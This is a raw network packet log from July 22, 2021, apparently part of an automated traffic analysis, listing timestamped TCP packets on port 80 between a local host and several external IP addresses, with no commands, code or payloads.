                                                Jul 22, 2021 16:11:04.783552885 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.783566952 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783574104 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.783588886 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.783597946 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.783611059 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.783704042 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784159899 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784185886 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784204006 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784220934 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784240007 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784241915 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784261942 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784261942 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784276009 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784282923 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784292936 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784302950 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784316063 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784322977 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784328938 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784346104 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784356117 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784368038 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784375906 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784389019 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784400940 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784410000 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784416914 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784430981 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784446001 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784452915 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784466028 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784473896 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784481049 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784495115 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784506083 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784518003 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784526110 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784533978 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784540892 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784554958 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784559965 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784564972 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784578085 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784580946 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784590960 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784603119 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784614086 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784622908 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784636021 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784643888 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784650087 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784663916 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784677029 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784687996 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784692049 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784709930 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784720898 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784729958 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784750938 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784751892 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784759998 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784771919 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784787893 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784800053 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784813881 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784830093 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784832954 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784852028 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.784869909 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.784881115 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.838396072 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.838438034 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.838476896 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.838510990 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.838541031 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.838571072 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.838579893 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.838601112 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.838612080 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.838629961 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.838641882 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.838660002 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.838669062 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.838690042 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.838691950 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.838726997 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.838728905 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.838761091 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.838777065 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.838783979 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.838790894 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.838809967 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.838820934 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.838829041 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.838877916 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.839462996 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.839498043 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.839529991 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.839553118 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.839562893 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.839587927 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.839590073 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.839616060 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.839623928 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.839638948 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.839653015 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.839663029 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.839683056 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.839683056 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.839713097 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.839724064 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.839741945 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.839751005 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.839771032 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.839771986 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.839802027 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.839812040 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.839834929 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.839838028 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.839871883 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.839881897 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.839899063 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.839900970 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.839941025 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.839943886 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.839982986 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.839983940 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.840032101 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.840043068 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.840074062 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.840076923 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.840116978 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.840116978 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.840156078 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.840157032 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.840195894 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.840195894 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.840238094 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.840240955 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.840281010 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.840287924 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.840320110 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.840329885 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.840348959 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.840352058 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.840383053 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.840388060 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.840421915 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.840428114 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.840466976 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.840467930 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.840497971 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.840507984 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.840528965 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.840552092 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.840559006 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.840568066 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.840589046 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.840591908 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.840619087 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.840627909 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.840651035 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.840656042 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.840688944 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.840693951 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.840734959 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.893575907 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.893601894 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.893618107 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.893629074 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.893645048 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.893661022 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.893681049 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.893699884 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.893723965 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.893745899 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.893748999 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.893768072 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.893770933 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.893774033 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.893805027 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.893949032 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.895359993 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.895390034 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.895410061 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.895427942 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.895448923 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.895467997 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.895488977 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.895490885 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.895508051 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.895512104 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.895513058 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.895514965 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.895535946 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.895536900 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.895558119 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.895560026 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.895581007 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.895581007 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.895598888 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.895605087 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.895618916 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.895637989 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.895699024 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.895720959 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.895741940 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.895749092 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.895765066 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.895765066 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.895783901 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.895806074 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.895807981 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.895828962 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.895850897 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.895872116 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.895872116 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.895894051 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.895895004 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.895908117 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.895910978 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.895911932 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.895920038 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.895930052 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.895944118 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.895965099 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.895965099 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.895987034 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.895987034 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.896003962 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.896003962 CEST80491698.211.241.0192.168.2.22
                                                Jul 22, 2021 16:11:04.896022081 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:04.896043062 CEST4916980192.168.2.228.211.241.0
                                                Jul 22, 2021 16:11:05.570666075 CEST4916880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:05.571880102 CEST4917080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:05.623153925 CEST8049168194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:05.623296976 CEST4916880192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:05.624011040 CEST8049170194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:05.624090910 CEST4917080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:05.626411915 CEST4917080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:05.678565979 CEST8049170194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:05.795413971 CEST8049170194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:05.795495033 CEST4917080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:05.914294958 CEST4917180192.168.2.2250.16.239.65
                                                Jul 22, 2021 16:11:06.029880047 CEST4917080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:06.031584024 CEST4917280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:06.079777002 CEST804917150.16.239.65192.168.2.22
                                                Jul 22, 2021 16:11:06.079889059 CEST4917180192.168.2.2250.16.239.65
                                                Jul 22, 2021 16:11:06.081828117 CEST4917180192.168.2.2250.16.239.65
                                                Jul 22, 2021 16:11:06.082034111 CEST8049170194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:06.082164049 CEST4917080192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:06.083905935 CEST8049172194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:06.083981037 CEST4917280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:06.085464954 CEST4917280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:06.137984037 CEST8049172194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:06.247175932 CEST804917150.16.239.65192.168.2.22
                                                Jul 22, 2021 16:11:06.253609896 CEST8049172194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:06.253807068 CEST4917280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:06.266412020 CEST804917150.16.239.65192.168.2.22
                                                Jul 22, 2021 16:11:06.266510010 CEST4917180192.168.2.2250.16.239.65
                                                Jul 22, 2021 16:11:06.419375896 CEST4917380192.168.2.2295.213.179.67
                                                Jul 22, 2021 16:11:06.475151062 CEST4917280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:06.477945089 CEST4917480192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:06.529861927 CEST8049172194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:06.529983044 CEST4917280192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:06.532917023 CEST8049174194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:06.533296108 CEST4917480192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:06.534090996 CEST4917480192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:06.537247896 CEST804917395.213.179.67192.168.2.22
                                                Jul 22, 2021 16:11:06.538549900 CEST4917380192.168.2.2295.213.179.67
                                                Jul 22, 2021 16:11:06.588155985 CEST8049174194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:06.655970097 CEST804917395.213.179.67192.168.2.22
                                                Jul 22, 2021 16:11:06.656426907 CEST4917380192.168.2.2295.213.179.67
                                                Jul 22, 2021 16:11:06.656562090 CEST4917380192.168.2.2295.213.179.67
                                                Jul 22, 2021 16:11:06.656682014 CEST4917380192.168.2.2295.213.179.67
                                                Jul 22, 2021 16:11:06.656800985 CEST4917380192.168.2.2295.213.179.67
                                                Jul 22, 2021 16:11:06.656919003 CEST4917380192.168.2.2295.213.179.67
                                                Jul 22, 2021 16:11:06.657737970 CEST4917380192.168.2.2295.213.179.67
                                                Jul 22, 2021 16:11:06.657861948 CEST4917380192.168.2.2295.213.179.67
                                                Jul 22, 2021 16:11:06.691916943 CEST8049174194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:06.692028046 CEST4917480192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:06.772986889 CEST804917395.213.179.67192.168.2.22
                                                Jul 22, 2021 16:11:06.773031950 CEST804917395.213.179.67192.168.2.22
                                                Jul 22, 2021 16:11:06.773057938 CEST804917395.213.179.67192.168.2.22
                                                Jul 22, 2021 16:11:06.773080111 CEST804917395.213.179.67192.168.2.22
                                                Jul 22, 2021 16:11:06.773103952 CEST804917395.213.179.67192.168.2.22
                                                Jul 22, 2021 16:11:06.773991108 CEST804917395.213.179.67192.168.2.22
                                                Jul 22, 2021 16:11:06.774019003 CEST804917395.213.179.67192.168.2.22
                                                Jul 22, 2021 16:11:06.917663097 CEST4917480192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:06.918839931 CEST4917580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:06.970083952 CEST8049174194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:06.970236063 CEST4917480192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:06.970854044 CEST8049175194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:06.970984936 CEST4917580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:06.971990108 CEST4917580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:07.024063110 CEST8049175194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:07.127315044 CEST8049175194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:07.127403975 CEST4917580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:07.149967909 CEST4917380192.168.2.2295.213.179.67
                                                Jul 22, 2021 16:11:07.150005102 CEST4917380192.168.2.2295.213.179.67
                                                Jul 22, 2021 16:11:07.150973082 CEST4917380192.168.2.2295.213.179.67
                                                Jul 22, 2021 16:11:07.151005983 CEST4917380192.168.2.2295.213.179.67
                                                Jul 22, 2021 16:11:07.154983044 CEST4917380192.168.2.2295.213.179.67
                                                Jul 22, 2021 16:11:07.155023098 CEST4917380192.168.2.2295.213.179.67
                                                Jul 22, 2021 16:11:07.268795013 CEST804917395.213.179.67192.168.2.22
                                                Jul 22, 2021 16:11:07.268825054 CEST804917395.213.179.67192.168.2.22
                                                Jul 22, 2021 16:11:07.268836021 CEST804917395.213.179.67192.168.2.22
                                                Jul 22, 2021 16:11:07.268846035 CEST804917395.213.179.67192.168.2.22
                                                Jul 22, 2021 16:11:07.271481037 CEST804917395.213.179.67192.168.2.22
                                                Jul 22, 2021 16:11:07.271508932 CEST804917395.213.179.67192.168.2.22
                                                Jul 22, 2021 16:11:07.348849058 CEST4917580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:07.350173950 CEST4917680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:07.403080940 CEST8049175194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:07.403105021 CEST8049176194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:07.403260946 CEST4917580192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:07.403328896 CEST4917680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:07.405028105 CEST4917680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:07.458740950 CEST8049176194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:07.562021971 CEST8049176194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:07.562212944 CEST4917680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:07.779802084 CEST4917680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:07.780780077 CEST4917780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:07.811274052 CEST4917380192.168.2.2295.213.179.67
                                                Jul 22, 2021 16:11:07.811311960 CEST4917380192.168.2.2295.213.179.67
                                                Jul 22, 2021 16:11:07.832178116 CEST8049176194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:07.832232952 CEST4917680192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:07.832811117 CEST8049177194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:07.832905054 CEST4917780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:07.833553076 CEST4917780192.168.2.22194.147.115.74
                                                Jul 22, 2021 16:11:07.849447966 CEST4917380192.168.2.2295.213.179.67
                                                Jul 22, 2021 16:11:07.849518061 CEST4917380192.168.2.2295.213.179.67
                                                Jul 22, 2021 16:11:07.849841118 CEST4917380192.168.2.2295.213.179.67
                                                Jul 22, 2021 16:11:07.849890947 CEST4917380192.168.2.2295.213.179.67
                                                Jul 22, 2021 16:11:07.850322962 CEST4917380192.168.2.2295.213.179.67
                                                Jul 22, 2021 16:11:07.850380898 CEST4917380192.168.2.2295.213.179.67
                                                Jul 22, 2021 16:11:07.850505114 CEST4917380192.168.2.2295.213.179.67
                                                Jul 22, 2021 16:11:07.850558043 CEST4917380192.168.2.2295.213.179.67
                                                Jul 22, 2021 16:11:07.850609064 CEST4917380192.168.2.2295.213.179.67
                                                Jul 22, 2021 16:11:07.885720015 CEST8049177194.147.115.74192.168.2.22
                                                Jul 22, 2021 16:11:07.917213917 CEST4917880192.168.2.2295.213.179.67
                                                Jul 22, 2021 16:11:07.927696943 CEST804917395.213.179.67192.168.2.22
                                                Jul 22, 2021 16:11:07.927712917 CEST804917395.213.179.67192.168.2.22
                                                Jul 22, 2021 16:11:07.966157913 CEST804917395.213.179.67192.168.2.22
